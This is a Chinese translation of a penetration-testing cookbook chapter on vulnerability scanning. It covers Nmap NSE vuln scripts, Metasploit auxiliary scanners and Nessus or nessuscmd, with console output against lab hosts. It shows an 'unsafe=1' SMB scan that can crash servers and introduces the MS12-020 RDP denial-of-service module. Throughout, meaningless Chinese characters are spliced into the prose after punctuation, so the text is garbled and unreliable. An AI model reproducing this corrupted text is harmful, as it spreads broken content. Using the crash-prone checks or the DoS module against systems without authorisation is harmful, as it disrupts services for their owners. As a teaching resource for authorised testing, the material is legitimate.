第五章 漏洞掃描
作者:Justin Hutchens
譯者:飛龍
協(xié)議:CC BY-NC-SA 4.0
盡管可以通過查看服務(wù)指紋的結(jié)果感憾,以及研究所識別的版本的相關(guān)漏洞來識別許多潛在漏洞,但這通常需要非常大量時間吨掌。 存在更多的精簡備選方案懒鉴,它們通衬嘁可以為你完成大部分這項工作神郊。 這些備選方案包括使用自動化腳本和程序,可以通過掃描遠程系統(tǒng)來識別漏洞宅静。 未驗證的漏洞掃描程序的原理是章蚣,向服務(wù)發(fā)送一系列不同的探針,來嘗試獲取表明漏洞存在的響應(yīng)姨夹。 或者纤垂,經(jīng)驗證的漏洞掃描器會使用提供所安裝的應(yīng)用,運行的服務(wù)磷账,文件系統(tǒng)和注冊表內(nèi)容信息的憑證峭沦,來直接查詢遠程系統(tǒng)。
5.1 Nmap 腳本引擎漏洞掃描
Nmap腳本引擎(NSE)提供了大量的腳本逃糟,可用于執(zhí)行一系列自動化任務(wù)來評估遠程系統(tǒng)熙侍。 Kali中可以找到的現(xiàn)有NSE腳本分為多個不同的類別,其中之一是漏洞識別履磨。
準(zhǔn)備
要使用NSE執(zhí)行漏洞分析,你需要有一個運行 TCP 或 UDP 網(wǎng)絡(luò)服務(wù)的系統(tǒng)庆尘。 在提供的示例中剃诅,會使用存在 SMB 服務(wù)漏洞的 Windows XP 系統(tǒng)。 有關(guān)設(shè)置 Windows 系統(tǒng)的更多信息驶忌,請參閱本書第一章“安裝Windows Server”秘籍矛辕。
操作步驟
許多不同的方法可以用于識別與任何給定的NSE腳本相關(guān)聯(lián)的功能。 最有效的方法之一是使用位于Nmap腳本目錄中的script.db文件付魔。 要查看文件的內(nèi)容聊品,我們可以使用cat命令,像這樣:
root@KaliLinux:~# cat /usr/share/nmap/scripts/script.db | more
Entry { filename = "acarsd-info.nse", categories = { "discovery", "safe", } }
Entry { filename = "address-info.nse", categories = { "default", "safe", } }
Entry { filename = "afp-brute.nse", categories = { "brute", "intrusive", } }
Entry { filename = "afp-ls.nse", categories = { "discovery", "safe", } }
Entry { filename = "afp-path-vuln.nse", categories = { "exploit", "intrusive", " vuln", } }
Entry { filename = "afp-serverinfo.nse", categories = { "default", "discovery", "safe", } }
Entry { filename = "afp-showmount.nse", categories = { "discovery", "safe", } }
Entry { filename = "ajp-auth.nse", categories = { "auth", "default", "safe", } }
Entry { filename = "ajp-brute.nse", categories = { "brute", "intrusive", } }
Entry { filename = "ajp-headers.nse", categories = { "discovery", "safe", } }
Entry { filename = "ajp-methods.nse", categories = { "default", "safe", } }
Entry { filename = "ajp-request.nse", categories = { "discovery", "safe", } }
這個script.db文件是一個非常簡單的索引几苍,顯示每個NSE腳本的文件名及其所屬的類別翻屈。 這些類別是標(biāo)準(zhǔn)化的,可以方便地對特定類型的腳本進行grep妻坝。 漏洞掃描腳本的類別名稱是vuln伸眶。 要識別所有漏洞腳本,需要對vuln術(shù)語進行grep刽宪,然后使用cut命令提取每個腳本的文件名厘贼。像這樣:
root@KaliLinux:~# grep vuln /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2
afp-path-vuln.nse
broadcast-avahi-dos.nse distcc-cve2004-2687.nse
firewall-bypass.nse
ftp-libopie.nse
ftp-proftpd-backdoor.nse
ftp-vsftpd-backdoor.nse
ftp-vuln-cve2010-4221.nse
http-awstatstotals-exec.nse
http-axis2-dir-traversal.nse
http-enum.nse http-frontpage-login.nse
http-git.nse http-huawei-hg5xx-vuln.nse
http-iis-webdav-vuln.nse
http-litespeed-sourcecode-download.nse
http-majordomo2-dir-traversal.nse
http-method-tamper.nse http-passwd.nse
http-phpself-xss.nse http-slowloris-check.nse
http-sql-injection.nse
http-tplink-dir-traversal.nse
為了進一步評估上述列表中任何給定腳本,可以使用cat命令來讀取.nse文件圣拄,它與script.db目錄相同嘴秸。因為大多數(shù)描述性內(nèi)容通常在文件的開頭,建議你將內(nèi)容傳遞給more,以便從上到下閱讀文件岳掐,如下所示:
root@KaliLinux:~# cat /usr/share/nmap/scripts/smb-check-vulns.nse | more
local msrpc = require "msrpc"
local nmap = require "nmap"
local smb = require "smb"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
description = [[
Checks for vulnerabilities:
* MS08-067, a Windows RPC vulnerability
* Conficker, an infection by the Conficker worm
* Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000
* SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
* MS06-025, a Windows Ras RPC service vulnerability
* MS07-029, a Windows Dns Server RPC service vulnerability
WARNING: These checks are dangerous, and are very likely to bring down a server. These should not be run in a production environment unless you (and, more importantly, the business) understand the risks!
在提供的示例中凭疮,我們可以看到smb-check-vulns.nse腳本檢測 SMB 服務(wù)相關(guān)的一些拒絕服務(wù)和遠程執(zhí)行漏洞。 這里岩四,可以找到每個評估的漏洞描述哭尝,以及 Microsoft 補丁和CVE 編號的引用,還有可以在線查詢的其他信息剖煌。 通過進一步閱讀材鹦,我們可以進一步了解腳本,像這樣:
--@usage
-- nmap
--script smb-check-vulns.nse -p445 <host>
-- sudo nmap -sU -sS
--script smb-check-vulns.nse -p U:137,T:139 <host>
---@output
-- Host script results:
-- | smb-check-vulns:
-- | MS08-067: NOT VULNERABLE
-- | Conficker: Likely CLEAN
-- | regsvc DoS: regsvc DoS: NOT VULNERABLE
-- | SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
-- | MS06-025: NO SERVICE (the Ras RPC service is inactive)
-- |_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
--- @args unsafe If set, this script will run checks that, if the system isn't
-- patched, are basically guaranteed to crash something. Remember that
-- non-unsafe checks aren't necessarily safe either)
-- @args safe If set, this script will only run checks that are known (or at
-- least suspected) to be safe.
----------------------------------------------------------------------
通過進一步閱讀耕姊,我們可以找到腳本特定的參數(shù)桶唐,適當(dāng)?shù)挠梅ㄒ约澳_本預(yù)期輸出的示例的詳細(xì)信息。要注意一個事實茉兰,有一個不安全的參數(shù)尤泽,可以設(shè)置為值0(未激活)或1(激活)。這實際上是Nmap漏洞腳本中的一個常見的現(xiàn)象规脸,理解它的用法很重要坯约。默認(rèn)情況下,不安全參數(shù)設(shè)置為0莫鸭。當(dāng)設(shè)置此值時闹丐,Nmap不執(zhí)行任何可能導(dǎo)致拒絕服務(wù)的測試。雖然這聽起來像是最佳選擇被因,但它通常意味著許多測試的結(jié)果將不太準(zhǔn)確卿拴,并且一些測試根本不會執(zhí)行。建議激活不安全參數(shù)以進行更徹底和準(zhǔn)確的掃描梨与,但這只應(yīng)在授權(quán)測試情況下針對生產(chǎn)系統(tǒng)執(zhí)行堕花。要運行漏洞掃描,應(yīng)使用nmap --script參數(shù)定義特定的NSE腳本粥鞋,并使用nmap --script-args參數(shù)傳遞所有腳本特定的參數(shù)缘挽。此外,要以最小的干擾輸出來運行漏洞掃描呻粹,應(yīng)將Nmap配置為僅掃描與被掃描服務(wù)對應(yīng)的端口到踏,如下所示:
root@KaliLinux:~# nmap --script smb-check-vulns.nse --scriptargs=unsafe=1 -p445 172.16.36.225
Starting Nmap 6.25 ( http://nmap.org ) at 2014-03-09 03:58 EDT
Nmap scan report for 172.16.36.225
Host is up (0.00041s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:18:11:FB (VMware)
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: NOT VULNERABLE
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Nmap done: 1 IP address (1 host up) scanned in 18.21 seconds
還有一個需要注意的NSE腳本,因為它提供了一個重要的漏洞掃描方式尚猿。 這個腳本是smb-vulnms10-061.nse窝稿。 這個腳本的細(xì)節(jié)可以通過使用cat命令pipe到more,從上到下閱讀腳本來獲得:
root@KaliLinux:~# cat /usr/share/nmap/scripts/smb-vuln-ms10-061.nse | more
local bin = require "bin"
local msrpc = require "msrpc"
local smb = require "smb"
local string = require "string"
local vulns = require "vulns"
local stdnse = require "stdnse"
description = [[
Tests whether target machines are vulnerable to ms10-061 Printer Spooler impersonation vulnerability.
此漏洞是Stuxnet蠕蟲利用的四個漏洞之一凿掂。 該腳本以安全的方式檢查vuln伴榔,而沒有崩潰遠程系統(tǒng)的可能性纹蝴,因為這不是內(nèi)存損壞漏洞。 為了執(zhí)行檢測踪少,它需要訪問遠程系統(tǒng)上的至少一個共享打印機塘安。 默認(rèn)情況下,它嘗試使用LANMAN API枚舉打印機援奢,在某些系統(tǒng)上通常不可用兼犯。 在這種情況下,用戶應(yīng)將打印機共享名稱指定為打印機腳本參數(shù)集漾。 要查找打印機共享切黔,可以使用smb-enum-share。
此外具篇,在某些系統(tǒng)上纬霞,訪問共享需要有效的憑據(jù),可以使用smb庫的參數(shù) smbuser和smbpassword指定驱显。我們對這個漏洞感興趣的原因是诗芜,在實際被利用之前,必須滿足多個因素必須埃疫。首先伏恐,系統(tǒng)必須運行涉及的操作系統(tǒng)之一(XP,Server 03 SP2栓霜,Vista翠桦,Server 08或Windows 7)。第二叙淌,它必須缺少MS10-061補丁,這個補丁解決了代碼執(zhí)行漏洞愁铺。最后鹰霍,系統(tǒng)上的本地打印共享必須可公開訪問。有趣的是茵乱,我們可以審計SMB 遠程后臺打印處理程序服務(wù)茂洒,以確定系統(tǒng)是否打補丁,無論系統(tǒng)上是否共享了現(xiàn)有的打印機瓶竭。正因為如此督勺,對于什么是漏洞系統(tǒng)存在不同的解釋。一些漏洞掃描程序會將未修補的系統(tǒng)識別為漏洞斤贰,但漏洞不能被實際利用智哀。或者荧恍,其他漏洞掃描程序(如NSE腳本)將評估所有所需條件瓷叫,以確定系統(tǒng)是否易受攻擊屯吊。在提供的示例中,掃描的系統(tǒng)未修補摹菠,但它也沒有共享遠程打印機盒卸。看看下面的例子:
root@KaliLinux:~# nmap -p 445 172.16.36.225 --script=smb-vuln-ms10-061
Starting Nmap 6.25 ( http://nmap.org ) at 2014-03-09 04:19 EDT
Nmap scan report for 172.16.36.225
Host is up (0.00036s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:18:11:FB (VMware)
Host script results:
|_smb-vuln-ms10-061: false
Nmap done: 1 IP address (1 host up) scanned in 13.16 seconds
在提供的示例中次氨,Nmap已確定系統(tǒng)不易受攻擊蔽介,因為它沒有共享遠程打印機。盡管確實無法利用此漏洞煮寡,但有些人仍然聲稱該漏洞仍然存在虹蓄,因為系統(tǒng)未修補,并且可以在管理員決定從該設(shè)備共享打印機的情況下利用此漏洞洲押。這就是必須評估所有漏洞掃描程序的結(jié)果的原因武花,以便完全了解其結(jié)果。一些掃描其僅選擇評估有限的條件杈帐,而其他掃描其更徹底体箕。這里很難判斷最好的答案是什么。大多數(shù)滲透測試人員可能更喜歡被告知系統(tǒng)由于環(huán)境變量而不易受到攻擊挑童,因此他們不會花費無數(shù)小時來試圖利用不能利用的漏洞累铅。或者站叼,系統(tǒng)管理員可能更喜歡知道系統(tǒng)缺少MS10-061補丁娃兽,以便系統(tǒng)可以完全安全,即使在現(xiàn)有條件下不能利用漏洞尽楔。
工作原理
大多數(shù)漏洞掃描程序通過評估多個不同的響應(yīng)投储,來嘗試確定系統(tǒng)是否容易受特定攻擊。 在一些情況下阔馋,漏洞掃描可以簡化為與遠程服務(wù)建立TCP連接玛荞,并且通過自開放的特征來識別已知的漏洞版本。 在其他情況下呕寝,可以向遠程服務(wù)發(fā)送一系列復(fù)雜的特定的探測請求勋眯,來試圖請求對服務(wù)唯一的響應(yīng),該服務(wù)易受特定的攻擊下梢。 在NSE漏洞腳本的示例中客蹋,如果激活了unsafe參數(shù),漏洞掃描實際上將嘗試?yán)么寺┒础?/p>
5.2 MSF 輔助模塊漏洞掃描
與NSE中提供的漏洞掃描腳本類似孽江,Metasploit還提供了一些有用的漏洞掃描程序讶坯。 類似于Nmap的腳本,大多數(shù)是相當(dāng)有針對性的岗屏,用于掃描特定的服務(wù)闽巩。
準(zhǔn)備
要使用 MSF 輔助模塊執(zhí)行漏洞分析钧舌,你需要有一個運行 TCP 或 UDP 網(wǎng)絡(luò)服務(wù)的系統(tǒng)。 在提供的示例中涎跨,會使用存在 SMB 服務(wù)漏洞的 Windows XP 系統(tǒng)洼冻。 有關(guān)設(shè)置 Windows 系統(tǒng)的更多信息,請參閱本書第一章“安裝Windows Server”秘籍隅很。
有多種不同的方法可以用于確定 Metasploit 中的漏洞掃描輔助模塊撞牢。 一種有效的方法是瀏覽輔助掃描器目錄,因為這是最常見的漏洞識別腳本所在的位置叔营。 看看下面的例子:
root@KaliLinux:/usr/share/metasploit-framework/modules/auxiliary/scanner/
mysql# cat mysql_authbypass_hashdump.rb | more
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MYSQL
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'MySQL Authentication Bypass Password Dump',
'Description' => %Q{
This module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. These hashes are stored as loot for later cracking.
這些腳本的布局是相當(dāng)標(biāo)準(zhǔn)化的屋彪,任何給定腳本的描述可以通過使用cat命令,然后將輸出pipe到more绒尊,從上到下閱讀腳本來確定畜挥。 在提供的示例中,我們可以看到該腳本測試了MySQL數(shù)據(jù)庫服務(wù)中存在的身份驗證繞過漏洞婴谱。 或者蟹但,可以在MSF控制臺界面中搜索漏洞識別模塊。 要打開它谭羔,應(yīng)該使用msfconsole命令华糖。 搜索命令之后可以與服務(wù)相關(guān)的特定關(guān)鍵字一同使用,或者可以使用scanner關(guān)鍵字查詢輔助/掃描器目錄中的所有腳本瘟裸,像這樣:
msf > search scanner
Matching Modules
================
Name
Disclosure Date Rank Description ---- --------------- ---- ----------
auxiliary/admin/smb/check_dir_file normal SMB Scanner Check File/Directory Utility
auxiliary/bnat/bnat_scan normal BNAT Scanner
auxiliary/gather/citrix_published_applications normal Citrix MetaFrame ICA Published Applications Scanner
auxiliary/gather/enum_dns normal DNS Record Scanner and Enumerator
auxiliary/gather/natpmp_external_address normal NAT-PMP External Address Scanner
auxiliary/scanner/afp/afp_login normal Apple Filing Protocol Login Utility
auxiliary/scanner/afp/afp_server_info normal Apple Filing Protocol Info Enumerator
auxiliary/scanner/backdoor/energizer_duo_detect normal Energizer DUO Trojan Scanner
auxiliary/scanner/db2/db2_auth normal DB2 Authentication Brute Force Utility
在識別看起來有希望的腳本時客叉,可以使用use命令結(jié)合相對路徑來激活該腳本。 一旦激活话告,以下info命令可用于讀取有關(guān)腳本的其他詳細(xì)信息兼搏,包括詳細(xì)信息,描述沙郭,選項和引用:
msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > info
Name: MS12-020 Microsoft Remote Desktop Checker
Module: auxiliary/scanner/rdp/ms12_020_check
Version: 0
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Royce Davis @R3dy_ <rdavis@accuvant.com>
Brandon McCann @zeknox <bmccann@accuvant.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- ---------- RHOSTS yes The target address range or CIDR identifier
RPORT 3389 yes Remote port running RDP
THREADS 1 yes The number of concurrent threads
Description:
This module checks a range of hosts for the MS12-020 vulnerability.
This does not cause a DoS on the target.
一旦選擇了模塊佛呻,show options命令可用于識別和/或修改掃描配置。 此命令將顯示四個列標(biāo)題棠绘,包括Name, Current Setting, Required, 和Description件相。 Name列標(biāo)識每個可配置變量的名稱再扭。 Current Setting列列出任何給定變量的現(xiàn)有配置氧苍。 Required列標(biāo)識任何給定變量是否需要值。 Description列描述每個變量的函數(shù)泛范。 可以通過使用set命令并提供新值作為參數(shù)让虐,來更改任何給定變量的值,如下所示:
msf auxiliary(ms12_020_check) > set RHOSTS 172.16.36.225
RHOSTS => 172.16.36.225
msf auxiliary(ms12_020_check) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed In this particular case, the system was not found to be vulnerable. However, in the case that a vulnerable system is identified, there is a corresponding exploitation module that can be used to actually cause a denial-of-service on the vulnerable system. This can be seen in the example provided:
msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_ maxchannelids
msf auxiliary(ms12_020_maxchannelids) > info
Name: MS12-020 Microsoft Remote Desktop Use-After-Free DoS Module: auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Version: 0
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Luigi Auriemma Daniel Godas-Lopez
Alex Ionescu jduck <jduck@metasploit.com> #ms12-020
Basic options:
Name Current Setting Required Description
---- --------------- -------- ----------
RHOST yes The target address
RPORT 3389 yes The target port
Description:
This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma.
The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition.
工作原理
大多數(shù)漏洞掃描程序會通過評估多個不同的響應(yīng)來嘗試確定系統(tǒng)是否容易受特定攻擊罢荡。 一些情況下赡突,漏洞掃描可以簡化為與遠程服務(wù)建立TCP連接并且通過自我公開的特征对扶,識別已知的漏洞版本。 在其他情況下惭缰,可以向遠程服務(wù)發(fā)送一系列復(fù)雜的特定的探測請求浪南,來試圖請求對服務(wù)唯一的響應(yīng),該服務(wù)易受特定的攻擊漱受。 在前面的例子中络凿,腳本的作者很可能找到了一種方法來請求唯一的響應(yīng),該響應(yīng)只能由修補過或沒有修補過的系統(tǒng)生成昂羡,然后用作確定任何給定的是否可利用的基礎(chǔ)絮记。
5.3 使用 Nessus 創(chuàng)建掃描策略
Nessus是最強大而全面的漏洞掃描器之一。 通過定位一個系統(tǒng)或一組系統(tǒng)虐先,Nessus將自動掃描所有可識別服務(wù)的大量漏洞怨愤。 可以在Nessus中構(gòu)建掃描策略,以更精確地定義Nessus測試的漏洞類型和執(zhí)行的掃描類型蛹批。 這個秘籍展示了如何在Nessus中配置唯一的掃描策略撰洗。
準(zhǔn)備
要在Nessus中配置掃描策略,必須首先在Kali Linux滲透測試平臺上安裝Nessus的功能副本般眉。 因為Nessus是一個需要許可的產(chǎn)品了赵,它不會在Kali默認(rèn)安裝。 有關(guān)如何在Kali中安裝Nessus的更多信息甸赃,請參閱第一章中的“Nessus 安裝”秘籍柿汛。
操作步驟
要在Nessus中配置新的掃描策略,首先需要訪問Nessus Web界面:https:// localhost:8834或https://127.0.0.1:8834埠对÷缍希或者,如果你不從運行Nessus的相同系統(tǒng)訪問Web界面项玛,則應(yīng)指定相應(yīng)的IP地址或主機名貌笨。加載Web界面后,你需要使用在安裝過程中配置的帳戶或安裝后構(gòu)建的其他帳戶登錄襟沮。登錄后锥惋,應(yīng)選擇頁面頂部的Policy選項卡。如果沒有配置其他策略开伏,您將看到一個空列表和一個New Policy按鈕膀跌。點擊該按鈕來開始構(gòu)建第一個掃描策略。
單擊New Policy后固灵,Policy Wizard屏幕將彈出一些預(yù)配置的掃描模板捅伤,可用于加快創(chuàng)建掃描策略的過程。如下面的屏幕截圖所示巫玻,每個模板都包含一個名稱丛忆,然后簡要描述其預(yù)期功能:
在大多數(shù)情況下祠汇,這些預(yù)配置的掃描配置文件中,至少一個與你嘗試完成的配置相似熄诡。 可能所有這些中最常用的是Basic Network Scan可很。 要記住,選擇任何一個選項后凰浮,仍然可以修改現(xiàn)有配置的每個詳細(xì)信息根穷。 它們只是在那里,讓你更快開始导坟。 或者屿良,如果你不想使用任何現(xiàn)有模板,您可以向下滾動并選擇Advanced Policy選項惫周,這會讓你從頭開始尘惧。
如果選擇任何一個預(yù)配置的模板,您可以通過三步快速的過程來完成掃描配置递递。 該過程分為以下步驟:
步驟1允許您配置基本詳細(xì)信息喷橙,包括配置文件名稱,描述和可見性(公共或私有)登舞。 公開的個人資料將對所有Nessus用戶可見贰逾,而私人個人只有創(chuàng)建它的用戶才能看到。
步驟2將簡單地詢問掃描是內(nèi)部掃描還是外部掃描菠秒。 外部掃描將是針對可公共訪問的主機執(zhí)行的疙剑,通常位于企業(yè)網(wǎng)絡(luò)的DMZ中。 外部掃描不要求你處于同一網(wǎng)絡(luò)践叠,但可以在Internet上執(zhí)行言缤。 或者,從網(wǎng)絡(luò)內(nèi)執(zhí)行內(nèi)部掃描禁灼,并且需要直接訪問掃描目標(biāo)的LAN管挟。
-
步驟3,最后一步弄捕,使用SSH或Windows身份驗證請求掃描設(shè)備的身份驗證憑據(jù)僻孝。 完成后,訪問
Profiles選項卡時守谓,可以在先前為空的列表中看到新的配置文件穿铆。 像這樣:
這種方法可以快速方便地創(chuàng)建新的掃描配置文件,但不能完全控制測試的漏洞和執(zhí)行的掃描類型分飞。 要修改更詳細(xì)的配置悴务,請單擊新創(chuàng)建的策略名稱睹限,然后單擊Advanced Mode鏈接譬猫。 此配置模式下的選項非常全面和具體讯檐。 可以在屏幕左側(cè)訪問四個不同的菜單,這包括:
General Settings(常規(guī)設(shè)置):此菜單提供基本配置染服,定義如何執(zhí)行發(fā)現(xiàn)和服務(wù)枚舉的詳細(xì)端口掃描選項别洪,以及定義有關(guān)速度,節(jié)流柳刮,并行性等策略的性能選項挖垛。
Credentials(憑證):此菜單可以配置Windows,SSH秉颗,Kerberos 憑據(jù)痢毒,甚至一些明文協(xié)議選項(不推薦)。
Plugins(插件):此菜單提供對Nessus插件的極其精細(xì)的控制蚕甥。 “插件”是Nessus中用于執(zhí)行特定審計或漏洞檢查的項目哪替。 你可以根據(jù)功能類型啟用或禁用審計組,或者逐個操作特定的插件菇怀。
Preferences(首選項):此菜單涵蓋了Nessus所有操作功能的更模糊的配置凭舶,例如HTTP身份驗證,爆破設(shè)置和數(shù)據(jù)庫交互爱沟。
工作原理
掃描策略定義了Nessus所使用的值帅霜,它定義了如何運行掃描。 這些掃描策略像完成簡單掃描向?qū)гO(shè)置所需的三個步驟一樣簡單呼伸,或者像定義每個獨特插件并應(yīng)用自定義認(rèn)證和操作配置一樣復(fù)雜身冀。
5.4 Nessus 漏洞掃描
Nessus是最強大和全面的漏洞掃描器之一。 通過定位一個系統(tǒng)或一組系統(tǒng)括享,Nessus能夠自動掃描所有可識別服務(wù)的大量漏洞闽铐。 一旦配置了掃描策略來定義Nessus掃描器的配置,掃描策略可用于對遠程目標(biāo)執(zhí)行掃描并進行評估奶浦。這個秘籍將展示如何使用Nessus執(zhí)行漏洞掃描兄墅。
準(zhǔn)備
要在Nessus中配置掃描策略,必須首先在Kali Linux滲透測試平臺上安裝Nessus的功能副本澳叉。 因為Nessus是一個需要許可的產(chǎn)品隙咸,它不會在Kali默認(rèn)安裝。 有關(guān)如何在Kali中安裝Nessus的更多信息成洗,請參閱第一章中的“Nessus 安裝”秘籍五督。
此外,在使用Nessus掃描之前瓶殃,需要創(chuàng)建至少一個掃描策略充包。 有關(guān)在Nessus中創(chuàng)建掃描策略的更多信息,請參閱上一個秘籍。
操作步驟
要在Nessus中開始新的掃描基矮,您需要確保在屏幕頂部選擇了Scans選項卡淆储。 如果過去沒有運行掃描,則會在屏幕中央生成一個空列表家浇。 要執(zhí)行第一次掃描本砰,您需要單擊屏幕左側(cè)的藍色New Scan按鈕,像這樣:
這需要一些基本的配置信息钢悲。系統(tǒng)將提示你輸入一系列字段点额,包括Name, Policy, Folder, 和 Targets。Name字段僅用作唯一標(biāo)識符莺琳,以將掃描結(jié)果與其他掃描區(qū)分開还棱。如果要執(zhí)行大量掃描,則有必要非常明確掃描名稱惭等。第二個字段是真正定義掃描的所有細(xì)節(jié)诱贿。此字段允許你選擇要使用的掃描策略。如果你不熟悉掃描策略的工作原理咕缎,請參閱本書中的上一個秘籍珠十。登錄用戶創(chuàng)建的任何公共或私有掃描策略都應(yīng)在Policy下拉菜單中顯示。 Folder字段定義將放置掃描結(jié)果的文件夾凭豪。當(dāng)你需要對大量掃描結(jié)果進行排序時焙蹭,在文件夾中組織掃描會很有幫助∩┥。可以通過單擊New Folder從Scans主菜單創(chuàng)建新的掃描文件夾孔厉。最后一個字段是Targets。此字段顯示如何定義要掃描的系統(tǒng)帖努。在這里撰豺,你可以輸入單個主機IP地址,IP地址列表拼余,IP地址的順序范圍污桦,CIDR范圍或IP范圍列表〕准啵或者凡橱,你可以使用主機名,假設(shè)掃描器能夠使用DNS正確解析為IP地址亭姥。最后稼钩,還有一個選項用于上傳文本文件,它包含任何上述格式的目標(biāo)列表达罗,像這樣:
配置掃描后坝撑,可以使用屏幕底部的Launch按鈕來執(zhí)行掃描。 這會立即將掃描添加到掃描列表,并且可以實時查看結(jié)果巡李,如以下屏幕截圖所示:
即使掃描正在運行抚笔,你也可以單擊掃描名稱,并在識別出來時開始查看漏洞击儡。 顏色編碼用于快速輕易地識別漏洞的數(shù)量及其嚴(yán)重性級別,如以下屏幕截圖所示:
單擊Example掃描后蝠引,我們可以看到兩個正在掃描的主機阳谍。 第一個表示掃描完成,第二個主機完成了2%螃概。 Vulnerabilities列中顯示的條形圖顯示與每個給定主機關(guān)聯(lián)的漏洞數(shù)量矫夯。 或者,可以單擊屏幕頂部的Vulnerabilities鏈接吊洼,根據(jù)發(fā)現(xiàn)的漏洞以及確定該漏洞的主機數(shù)量來組織結(jié)果训貌。 在屏幕的右側(cè),我們可以看到類似的餅圖冒窍,但這一個對應(yīng)于所有掃描的主機递沪,如以下屏幕截圖所示:
此餅圖還清晰定義每種顏色的含義,從關(guān)鍵漏洞到詳細(xì)信息综液。 通過選擇任何特定主機IP地址的鏈接款慨,你可以看到識別為該主機的特定漏洞:
此漏洞列表標(biāo)識插件名稱,通常會給出發(fā)現(xiàn)和嚴(yán)重性級別的簡要說明谬莹。 作為滲透測試程序檩奠,如果你要在目標(biāo)系統(tǒng)上實現(xiàn)遠程代碼執(zhí)行,關(guān)鍵和高漏洞通常是最有希望的附帽。 通過單擊任何一個特定漏洞埠戳,你可以獲得該漏洞的大量詳細(xì)信息,如以下屏幕截圖所示:
除了描述和修補信息之外蕉扮,該頁面還將為進一步研究提供替代來源整胃,最重要的是(對于滲透測試人員)顯示是否存在漏洞。 此頁面通常還會表明可用的利用是否是公開的利用喳钟,或者是否存在于利用框架(如Metasploit爪模,CANVAS 或 Core Impact)中。
工作原理
大多數(shù)漏洞掃描程序會通過評估多個不同的響應(yīng)來嘗試確定系統(tǒng)是否容易受特定攻擊荚藻。 一些情況下屋灌,漏洞掃描可以簡化為與遠程服務(wù)建立TCP連接并且通過自我公開的特征,識別已知的漏洞版本应狱。 在其他情況下共郭,可以向遠程服務(wù)發(fā)送一系列復(fù)雜的特定的探測請求,來試圖請求對服務(wù)唯一的響應(yīng),該服務(wù)易受特定的攻擊除嘹。 Nessus同時執(zhí)行大量測試写半,來試圖為給定目標(biāo)生成完整的攻擊面圖像。
5.5 Nessuscmd 命令行掃描
Nessuscmd是Nessus中的命令行工具尉咕。 如果你希望將Nessus插件掃描集成到腳本叠蝇,或重新評估先前發(fā)現(xiàn)的漏洞,Nessuscmd可能非常有用年缎。
準(zhǔn)備
要在Nessus中配置掃描策略悔捶,必須首先在Kali Linux滲透測試平臺上安裝Nessus的功能副本。 因為Nessus是一個需要許可的產(chǎn)品单芜,它不會在Kali默認(rèn)安裝蜕该。 有關(guān)如何在Kali中安裝Nessus的更多信息,請參閱第一章中的“Nessus 安裝”秘籍洲鸠。
操作步驟
你需要切換到包含nessuscmd腳本的目錄來開始堂淡。 然后,通過不提供任何參數(shù)來執(zhí)行腳本扒腕,你可以查看包含相應(yīng)用法和可用選項的輸出绢淀,如下所示:
root@KaliLinux:~# cd /opt/nessus/bin/
root@KaliLinux:/opt/nessus/bin# ./nessuscmd
Error - no target specified
nessuscmd (Nessus) 5.2.5 [build N25109]
Copyright (C) 1998 - 2014 Tenable Network Security, Inc
Usage:
nessuscmd <option> target...
為了使用已知的Nessus插件ID對遠程主機執(zhí)行nessuscmd掃描,必須使用-i參數(shù)瘾腰,并提供所需的插件ID的值更啄。 出于演示目的,我們使用知名的MS08-067漏洞的插件ID執(zhí)行掃描居灯,如下所示:
root@KaliLinux:/opt/nessus/bin# ./nessuscmd -i 34477 172.16.36.135
Starting nessuscmd 5.2.5
Scanning '172.16.36.135'...
+ Host 172.16.36.135 is up
第一次掃描在不容易受到指定插件測試的漏洞攻擊的主機上執(zhí)行祭务。 輸出顯式主機已啟動,但未提供其他輸出怪嫌。 或者义锥,如果系統(tǒng)存在漏洞,會返回對應(yīng)這個插件的輸出岩灭,像這樣:
root@KaliLinux:/opt/nessus/bin# ./nessuscmd -i 34477 172.16.36.225
Starting nessuscmd 5.2.5
Scanning '172.16.36.225'...
+ Results found on 172.16.36.225 :
- Port microsoft-ds (445/tcp)
[!] Plugin ID 34477
|
| Synopsis :
|
|
| Arbitrary code can be executed on the remote host due to a flaw
| in the
| 'Server' service.
|
| Description :
|
|
| The remote host is vulnerable to a buffer overrun in the 'Server'
| service that may allow an attacker to execute arbitrary code on
| the
| remote host with the 'System' privileges.
| See also :
|
|
| http://technet.microsoft.com/en-us/security/bulletin/ms08-067
|
|
|
| Solution :
|
| Microsoft has released a set of patches for Windows 2000, XP, 2003,
| Vista and 2008.
|
| Risk factor :
|
|
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVSS Temporal Score : 8.7
| (CVSS2#E:H/RL:OF/RC:C)
| Public Exploit Available : true
工作原理
